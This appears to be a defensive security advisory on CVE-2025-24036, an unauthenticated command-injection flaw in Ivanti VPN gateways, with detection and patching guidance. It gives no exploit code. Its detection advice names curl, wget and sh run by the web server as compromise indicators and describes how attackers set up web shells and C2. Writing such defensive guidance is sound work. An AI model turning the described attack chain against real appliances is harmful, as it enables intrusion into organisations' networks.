CVE-2025-24036: Critical RCE in Ivanti Connect Secure — Patch Now

Analysis of CVE-2025-24036 and VPN Security Risks

Security researchers and the ISC Stormcast have highlighted a critical RCE vulnerability identified as CVE-2025-24036, which impacts Ivanti Connect Secure (ICS) and Ivanti Policy Secure (IPS) gateways. This flaw represents a significant risk to organizational perimeters, as it allows an unauthenticated attacker to execute arbitrary commands on the underlying operating system. Given the position of these appliances at the edge of the network, successful exploitation often serves as the initial access vector for broader campaigns.

The vulnerability stems from insufficient validation of input processed by specific web-facing components of the gateway software. By sending a specially crafted request to an exposed API endpoint, an attacker can bypass authentication and achieve command injection. This CVE carries a CVSS score of 10.0, reflecting its maximum severity and the ease with which it can be weaponized by threat actors. This is particularly concerning as sophisticated APT groups, such as Volt Typhoon, have historically targeted Ivanti appliances to maintain persistence and facilitate Lateral Movement within high-value targets.

Unauthenticated RCE in Ivanti Policy Secure and Connect Secure

Technically, the unauthenticated RCE in Ivanti Policy Secure and Connect Secure involves a failure in the gateway’s request handling logic. Attackers target the management interface or the client-facing VPN portal to inject malicious payloads. Once code execution is achieved, the adversary typically attempts to establish C2 communications and deploy web shells to ensure long-term access, even after reboots. This TTP is consistent with observed MITRE ATT&CK patterns where edge devices are compromised to circumvent traditional EDR solutions that may not have visibility into specialized appliance firmware.

How to Detect CVE-2025-24036 Exploit Attempts

Security teams must focus on identifying anomalies within their gateway logs and network traffic. To understand how to detect CVE-2025-24036 exploit patterns, SOC analysts should monitor for unusual HTTP POST requests directed at /api/v1/configuration/ or similar administrative paths that should not be accessible to unauthenticated users. Reviewing SIEM data for the execution of unexpected system binaries like curl, wget, or sh from the web server process is a primary IoC.

Furthermore, defenders should utilize the Ivanti Integrity Checker Tool (ICT). This utility compares the current state of the appliance’s file system against a known-good baseline. Any new or modified files in the /home/web/ or /tmp/ directories should be treated as evidence of a potential compromise. It is vital to use the external ICT, as an internal checker may be subverted by a resident attacker who has achieved Privilege Escalation.

Remediation and Ivanti Connect Secure 22.7R2 Patch Guidance

The most effective defense against this threat is the immediate application of vendor-provided security updates. Following Ivanti Connect Secure 22.7R2 patch guidance, administrators should upgrade to the latest minor version (e.g., 22.7R2.4 or higher) specifically designed to address this vulnerability. If patching is not immediately feasible, organizations should restrict access to the management interface by placing it behind a Zero Trust access proxy or a restricted management network.

Before applying the patch, it is recommended to take a snapshot or forensic image of the appliance if possible. This ensures that if the system was already compromised, evidence is preserved for incident response teams. Post-patching, all active sessions should be terminated, and local credentials—including API keys and certificates—should be rotated to mitigate the risk of stolen session tokens being used for continued access.